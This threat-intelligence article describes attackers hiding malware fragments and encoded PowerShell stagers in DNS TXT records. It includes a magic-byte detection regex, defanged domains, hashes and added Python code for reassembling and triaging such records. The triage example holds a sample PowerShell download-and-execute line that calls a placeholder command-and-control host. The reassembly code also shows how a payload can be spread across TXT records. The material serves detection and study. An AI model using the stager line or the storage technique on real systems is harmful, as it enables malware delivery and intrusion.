Threat actors are exploiting DNS infrastructure to hide malware and establish persistent command-and-control communications, turning the internet's foundational addressing system into an unwitting storage and delivery platform for malicious software.
The discovery, made through analysis of passively collected DNS records in DNSDB Scout, shows how attackers partition executable files and store the pieces across multiple DNS TXT records as hexadecimal strings.
The search pattern used in DNSDB Scout, which matches TXT records whose hex content begins with the magic number of a common file type (JPEG, PNG, GIF87a/89a, PDF, ZIP, MZ, ELF, Mach-O, gzip, 7z or RAR), was:
^"((ffd8ffe[0-9a-f].{12,})|(89504e47.{12,})|(47494638[79]61.{8,})|(255044462d.{10,})|(504b0304.{12,})|(4d5a.{16,59}|4d5a.{61,})|(7f454c46.{12,})|(c[ef]faedfe.{12,})|(1f8b08.{14,})|(377abcaf271c.{8,})|(526172211a07.{8,})).
The fragments persist until the DNS operator removes or overwrites the records, effectively giving the attacker a distributed storage system that sits beneath the radar of traditional security monitoring.
Researchers identified the activity by searching for file magic bytes, the fixed byte sequences at the start of a file that identify its type, at the beginning of DNS TXT records.
Using the regex above to detect executable file headers, they found TXT records beginning with 4d5a, the hex encoding of the "MZ" magic of Windows executables, across three different domains that shared an identical subdomain pattern.
The investigation focused on names matching "*.felix.stf.whitetreecollective[.]com", where the leftmost label was an integer; hundreds of such subdomains existed, each storing a different fragment of an executable.
The integers are sequence markers: fetching the TXT record of each subdomain and concatenating the hex data in numeric order reconstructs the complete payload, regardless of the order in which the records were collected.
When researchers reassembled the fragments this way, they recovered two complete executables with SHA256 hashes 7ff0ecf2953b8662ede1577e330a514f09992c18aa3c14ed77cf2ffc115b0866 and e7b22ba761a7f853b63933ffe517cc61596710dbdee992a429ac1bc8d04186a1.
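To make the reassembly concrete, here is an added example (written for this page; it is not DomainTools' code or the researchers' tooling) that runs the same magic-byte regex over a list of passive-DNS TXT records, groups numbered subdomains under their parent name, rebuilds the file in sequence order and hashes it. The records, the felix.stf.example.com name and the MZ-prefixed blob are constructed for the demo and are not a real executable; the gap check shows what happens when one fragment is absent from the passive-DNS view.

```python
import hashlib
import re
from collections import defaultdict

# The DNSDB Scout search pattern from the article, anchored at the opening quote of
# a TXT rdata string. Each alternative is the hex-encoded magic of a common file type:
# JPEG, PNG, GIF87a/GIF89a, %PDF-, ZIP (PK..), MZ, ELF, Mach-O, gzip, 7z, RAR.
MAGIC_RE = re.compile(
    r'^"((ffd8ffe[0-9a-f].{12,})|(89504e47.{12,})|(47494638[79]61.{8,})'
    r'|(255044462d.{10,})|(504b0304.{12,})|(4d5a.{16,59}|4d5a.{61,})'
    r'|(7f454c46.{12,})|(c[ef]faedfe.{12,})|(1f8b08.{14,})'
    r'|(377abcaf271c.{8,})|(526172211a07.{8,}))'
)
# Leading integer label used as the fragment sequence number: "17.<parent>"
SEQ_RE = re.compile(r"^(\d+)\.(.+)$")


def txt_strings(rdata: str) -> str:
    """Join the quoted character-strings of a TXT rdata ('"abc" "def"') into one string."""
    return "".join(re.findall(r'"([^"]*)"', rdata))


def find_magic_records(records):
    """(rrname, rdata) pairs whose first TXT string starts with a known file magic."""
    return [(name, rdata) for name, rdata in records if MAGIC_RE.match(rdata)]


def group_fragments(records):
    """Map parent name -> {sequence number: hex chunk} for numbered, hex-only TXT records."""
    groups = defaultdict(dict)
    for name, rdata in records:
        m = SEQ_RE.match(name.rstrip("."))
        chunk = txt_strings(rdata)
        if m and re.fullmatch(r"[0-9a-fA-F]+", chunk) and len(chunk) % 2 == 0:
            groups[m.group(2)][int(m.group(1))] = chunk
    return groups


def reassemble(chunks):
    """Concatenate hex chunks in sequence order; refuse to rebuild across a gap."""
    seqs = sorted(chunks)
    missing = sorted(set(range(seqs[0], seqs[-1] + 1)) - set(seqs))
    if missing:
        raise ValueError(f"missing fragments: {missing}")
    return bytes.fromhex("".join(chunks[i] for i in seqs))


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def carve_files(records):
    """Rebuild every file whose first fragment carries a magic; returns {name: (bytes, sha256)}."""
    groups = group_fragments(records)
    carved = {}
    for name, rdata in find_magic_records(records):
        m = SEQ_RE.match(name.rstrip("."))
        if m and m.group(2) in groups:
            parent = m.group(2)            # the regex only flags fragment 1; walk its siblings
            data = reassemble(groups[parent])
            carved[parent] = (data, sha256_hex(data))
        else:                              # a whole (small) file held in a single TXT record
            try:
                data = bytes.fromhex(txt_strings(rdata))
            except ValueError:
                continue
            carved[name.rstrip(".")] = (data, sha256_hex(data))
    return carved


# Constructed sample data (not records from the article): an MZ-prefixed blob that is not
# a real executable, hex-encoded 32 bytes per record under a placeholder name, mixed with
# ordinary TXT records and listed out of order, as passive DNS returns them.
SAMPLE_EXE = b"MZ" + b"\x00" * 58 + b"\x80\x00\x00\x00" + b"CONSTRUCTED-SAMPLE-NOT-A-REAL-PE" * 4
SAMPLE_PARENT = "felix.stf.example.com"


def build_sample_records(payload: bytes, parent: str, chunk_hex: int = 64):
    hexed = payload.hex()
    records = []
    for seq, i in enumerate(range(0, len(hexed), chunk_hex), start=1):
        chunk = hexed[i:i + chunk_hex]
        # DNSDB presents long TXT rdata as several quoted strings; split one chunk that way
        rdata = f'"{chunk}"' if seq != 2 else f'"{chunk[:30]}" "{chunk[30:]}"'
        records.append((f"{seq}.{parent}.", rdata))
    return records


SAMPLE_RECORDS = [
    ("example.com.", '"v=spf1 include:_spf.example.com -all"'),
    ("_dmarc.example.com.", '"v=DMARC1; p=reject"'),
] + build_sample_records(SAMPLE_EXE, SAMPLE_PARENT)[::-1]

if __name__ == "__main__":
    for name, (data, digest) in carve_files(SAMPLE_RECORDS).items():
        print(f"{name}: {len(data)} bytes, sha256={digest}")
```

In practice the record list would come from a DNSDB Scout export or a zone dump; the only assumptions are that rdata is presented as quoted strings and that the sequence number is the leftmost label. Because the magic regex only ever hits the first fragment, a hunting query that stops at the match misses the payload; the siblings have to be collected separately, which is what carve_files does.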
Beyond file storage, the investigation found attackers using DNS TXT records to hold malicious commands and bootstrap communication with command-and-control servers.
Multiple TXT records under drsmitty[.]com contained encoded PowerShell scripts that functioned as malware stagers.
Once decoded and executed, these scripts would connect to external domains such as cspg[.]pw and request additional payloads from specific endpoints.
The URL path "/api/v1/nps/payload/stage1" matches the default configuration of Covenant C2, a popular post-exploitation framework used by threat actors to maintain persistent access to compromised systems.
Analysis showed that both recovered executables were Joke Screenmate malware, prank software that displays fake error messages, interferes with user control, and consumes system resources while resisting attempts to close it.
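As an added example (not the researchers' code), the following triage routine decodes a TXT record that holds an encoded PowerShell stager and reports what the script would do. It assumes the base64-of-UTF-16LE encoding that powershell.exe -EncodedCommand accepts, falling back to UTF-8; the article does not state which encoding the drsmitty[.]com records used. The sample script and the c2.example.net host are constructed; only the Covenant default path is taken from the article.

```python
import base64
import re

# Covenant's default stager path, as cited in the article.
COVENANT_STAGE1 = "/api/v1/nps/payload/stage1"
URL_RE = re.compile(r"""https?://[^\s'"`)]+""")
DOWNLOAD_RE = re.compile(
    r"DownloadString|DownloadData|Invoke-WebRequest|Invoke-RestMethod|\biwr\b|\birm\b", re.I)
EXEC_RE = re.compile(r"\bIEX\b|Invoke-Expression", re.I)


def txt_strings(rdata: str) -> str:
    """Join the quoted character-strings of a TXT rdata ('"abc" "def"') into one string."""
    return "".join(re.findall(r'"([^"]*)"', rdata))


def decode_powershell_txt(rdata: str):
    """Return the script text hidden in a base64 TXT record, or None if it is not one.
    Handles the UTF-16LE form used by -EncodedCommand as well as plain UTF-8 text."""
    blob = txt_strings(rdata).strip()
    if not blob or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", blob):
        return None
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    # UTF-16LE text made of ASCII characters has a NUL in every odd byte position
    if len(raw) >= 2 and len(raw) % 2 == 0 and raw[1::2] == b"\x00" * (len(raw) // 2):
        text = raw.decode("utf-16-le")
    else:
        try:
            text = raw.decode("utf-8")
        except UnicodeDecodeError:
            return None
    if not all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return None
    return text


def triage_stager(rdata: str):
    """Summarise a decoded TXT-hosted script: URLs it contacts, whether it downloads and
    executes, and whether any URL uses Covenant's default stage-1 path."""
    text = decode_powershell_txt(rdata)
    if text is None:
        return None
    urls = URL_RE.findall(text)
    return {
        "script": text,
        "urls": urls,
        "downloads": bool(DOWNLOAD_RE.search(text)),
        "executes": bool(EXEC_RE.search(text)),
        "covenant_default_path": any(COVENANT_STAGE1 in u for u in urls),
    }


def encode_as_txt(script: str) -> str:
    """Build the TXT rdata form used for the demo: base64 of the UTF-16LE script, split into
    255-byte character-strings the way a resolver or DNSDB presents long TXT data."""
    b64 = base64.b64encode(script.encode("utf-16-le")).decode()
    return " ".join(f'"{b64[i:i + 255]}"' for i in range(0, len(b64), 255))


# Constructed sample in the style the article describes (placeholder C2 host; only the
# path is the Covenant default cited in the article). Never execute the decoded script.
SAMPLE_SCRIPT = ("$c = New-Object Net.WebClient; "
                 "IEX $c.DownloadString('http://c2.example.net/api/v1/nps/payload/stage1')")
SAMPLE_TXT = encode_as_txt(SAMPLE_SCRIPT)
BENIGN_TXT = '"v=spf1 include:_spf.example.com -all"'

if __name__ == "__main__":
    print(triage_stager(SAMPLE_TXT))
    print(triage_stager(BENIGN_TXT))
```

The UTF-16LE heuristic is deliberately strict (every odd byte must be NUL) so that random binary data that happens to be valid base64 is not misreported as a script; real hunting would also want to try the gzip-plus-base64 wrapping that many stagers use, which this example does not cover.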
The campaign demonstrates remarkable persistence, with evidence that the same threat actors maintained operations across multiple years.
The same C2 domain referenced in the 2021-2022 ScreenMate malware distribution was also observed in DNS TXT records from July 2017, specifically in records for msg1.rickrick.qa.urab[.]org.
The technique is a concerning evolution in malware distribution: it exploits the inherent trust placed in DNS infrastructure while operating where traditional security monitoring has limited visibility.
Because the records persist until they are manually removed or overwritten, they form an effective dead-drop system that can remain operational for extended periods without further attacker intervention.